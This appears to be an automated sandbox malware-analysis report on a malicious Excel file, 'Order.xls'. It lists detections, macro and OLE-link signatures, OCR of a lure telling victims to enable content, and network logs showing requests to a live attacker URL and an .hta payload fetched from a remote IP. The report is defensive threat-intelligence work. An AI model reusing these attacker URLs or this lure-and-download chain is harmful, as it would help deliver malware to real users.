Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order.xls

Overview

General Information

Sample name:Order.xls
Analysis ID:1592075
MD5:439a22208699135960b30717b0aeedbc
SHA1:f0a626b392d2cf72659b567e8a75d8d862195669
SHA256:b04e78fa62cab8562fdcd884fa8813a4e802c8f78bfa8c1d25db2a8684868dd0
Tags:xlsuser-abuse_ch
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w11x64_office
  • EXCEL.EXE (PID: 8464 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • splwow64.exe (PID: 4672 cmdline: C:\Windows\splwow64.exe 12288 MD5: 4C1F48431A4C5DE7841216C32CD98C46)
  • EXCEL.EXE (PID: 1096 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Order.xls" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 14.103.79.10, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 8464, Protocol: tcp, SourceIp: 192.168.2.27, SourceIsIpv6: false, SourcePort: 49707
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.27, DestinationIsIpv6: false, DestinationPort: 49707, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 8464, Protocol: tcp, SourceIp: 14.103.79.10, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Order.xlsAvira: detected
Source: Order.xlsReversingLabs: Detection: 36%
Source: Order.xlsJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.27:49708 version: TLS 1.2
Source: global trafficDNS query: name: s.deemos.com
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.27:49708 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.27:49709 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.27:49708 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.27:49708 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.27:49708 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.27:49708 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.27:49708 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.27:49708 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.27:49708 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.27:49708 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.27:49708 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.27:49707
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.27:49707
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.27:49707
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.27:49707
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.27:49707
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.27:49707
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.27:49707
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.27:49707
Source: global trafficTCP traffic: 192.168.2.27:49708 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.27:49708
Source: global trafficTCP traffic: 192.168.2.27:49708 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.27:49708 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.27:49708
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.27:49707
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.27:49707
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.27:49707
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.27:49707 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.27:49707
Source: global trafficTCP traffic: 192.168.2.27:49709 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.27:49709
Source: global trafficTCP traffic: 192.168.2.27:49709 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.27:49709 -> 172.245.119.74:80
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.27:49708
Source: global trafficTCP traffic: 192.168.2.27:49708 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.27:49708 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.27:49708
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.27:49708
Source: global trafficTCP traffic: 192.168.2.27:49708 -> 13.107.246.45:443
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.27:49709
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.27:49708
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.27:49708
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.27:49708
Source: global trafficTCP traffic: 192.168.2.27:49708 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.27:49708 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.27:49708 -> 13.107.246.45:443
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.27:49708
Source: global trafficTCP traffic: 13.107.246.45:443 -> 192.168.2.27:49708
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.27:49709
Source: global trafficTCP traffic: 192.168.2.27:49709 -> 172.245.119.74:80
Source: global trafficTCP traffic: 192.168.2.27:49709 -> 172.245.119.74:80
Source: global trafficTCP traffic: 172.245.119.74:80 -> 192.168.2.27:49709
Source: Joe Sandbox ViewIP Address: 14.103.79.10 14.103.79.10
Source: Joe Sandbox ViewIP Address: 13.107.246.45 13.107.246.45
Source: Joe Sandbox ViewJA3 fingerprint: 258a5a1e95b8a911872bae9081526644
Source: global trafficHTTP traffic detected: GET /ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/sns/createdbestthingsforhappinesswithoutmegivenyouforher.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rules/rule170146v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /xampp/sns/createdbestthingsforhappinesswithoutmegivenyouforher.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.119.74
Source: global trafficDNS traffic detected: DNS query: s.deemos.com
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: Primary1736961863141152600_30F1E7AD-2CD3-49E3-986C-1472D8A89B92.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40/flatfontassets.pkg
Source: Order.xls, 3F630000.0.drString found in binary or memory: https://s.deemos.com/ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.27:49708 version: TLS 1.2

System Summary

barindex
Source: screenshotOCR: document is protected Open the document in If this document was Once you have enabled O 3 editing, p
Source: screenshotOCR: protected documents the yellow bar above Renmks. 27 1: Above price is based on EXT China, not inclu
Source: screenshotOCR: Enable Content" from the yellow bar above protected documents the yellow bar above Renmks. 27 1: Ab
Source: screenshotOCR: document is protected Open the document in If this document was Once you have enabled O 3 editing, p
Source: screenshotOCR: protected documents the yellow bar above Renmks. 27 1: Above price is based on EXT China, not inclu
Source: screenshotOCR: Enable Content" from the yellow bar above protected documents the yellow bar above Renmks. 27 1: Ab
Source: screenshotOCR: document is protected Open the document in If this document was Once you have enabled O 3 editing, p
Source: screenshotOCR: protected documents the yellow bar above Renmks. 27 1: Above price is based on EXT China, not inclu
Source: screenshotOCR: Enable Content" from the yellow bar above protected documents the yellow bar above Renmks. 27 1: Ab
Source: screenshotOCR: document is protected Open the document in If this document was Once you have enabled O 3 editing, p
Source: screenshotOCR: protected documents the yellow bar above Renmks. 27 1: Above price is based on EXT China, not inclu
Source: screenshotOCR: Enable Content" from the yellow bar above protected documents the yellow bar above Renmks. 27 1: Ab
Source: screenshotOCR: document is protected 16 17 18 19 20 27 28 29 VsI droppe Keep an eye on it Anchor up We will keep tr
Source: screenshotOCR: document is protected _l_ L at at at at at at at at _1_ 10 If this document was the yellow bar above
Source: screenshotOCR: protected documents This document is protected _l_ L at at at at at at at at _1_ 10 If this document
Source: screenshotOCR: Enable Content from the yellow bar above 30 M /7,3M 60 M /8,9 M 16. LT Initial calculation e
Source: Order.xlsOLE: Microsoft Excel 2007+
Source: Order.xlsOLE: Microsoft Excel 2007+
Source: Order.xlsOLE: Microsoft Excel 2007+
Source: 3F630000.0.drOLE: Microsoft Excel 2007+
Source: 3F630000.0.drOLE: Microsoft Excel 2007+
Source: Order.xlsOLE indicator, VBA macros: true
Source: Order.xlsStream path 'MBD0047BAAB/\x1Ole' : https://s.deemos.com/ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window~9[PxqWl> RQtzF}-iik[*hpy1,,{6X`+|gL[cMnjD0`1{(+i(g*=WddEG1;;zn-8l;Mj/KSuC,Wqk%h*d`A],0YctZFNmkG9Pi8qjdVBAEjR3cYCilTaG3qtEh3qqO17QvBUvwMY4cyu4t9ESIqKt6K11qER2aBq0qzGGV5JVb1UVplt7937QdsyUMf2VuiS753J2R7r9RNhBKOCXSsDQbOYlbZ0xjXfbQL9IWgGwWwWh0pukRPLHWSHRpYwqkYDbZERe2waqE2BGt1b1OEKySqV3Xdd%[/Duxpp'1[X.+
Source: 3F630000.0.drStream path 'MBD0047BAAB/\x1Ole' : https://s.deemos.com/ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window~9[PxqWl> RQtzF}-iik[*hpy1,,{6X`+|gL[cMnjD0`1{(+i(g*=WddEG1;;zn-8l;Mj/KSuC,Wqk%h*d`A],0YctZFNmkG9Pi8qjdVBAEjR3cYCilTaG3qtEh3qqO17QvBUvwMY4cyu4t9ESIqKt6K11qER2aBq0qzGGV5JVb1UVplt7937QdsyUMf2VuiS753J2R7r9RNhBKOCXSsDQbOYlbZ0xjXfbQL9IWgGwWwWh0pukRPLHWSHRpYwqkYDbZERe2waqE2BGt1b1OEKySqV3Xdd%[/Duxpp'1[X.+
Source: ~DF34BA6678CCE4CC0C.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engineClassification label: mal72.winXLS@4/14@2/3
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\3F630000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{30F1E7AD-2CD3-49E3-986C-1472D8A89B92} - OProcSessId.datJump to behavior
Source: Order.xlsOLE indicator, Workbook stream: true
Source: 3F630000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Order.xlsReversingLabs: Detection: 36%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Order.xls"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: Order.xlsStatic file information: File size 1275904 > 1048576
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: ~DF34BA6678CCE4CC0C.TMP.0.drInitial sample: OLE indicators vbamacros = False
Source: Order.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
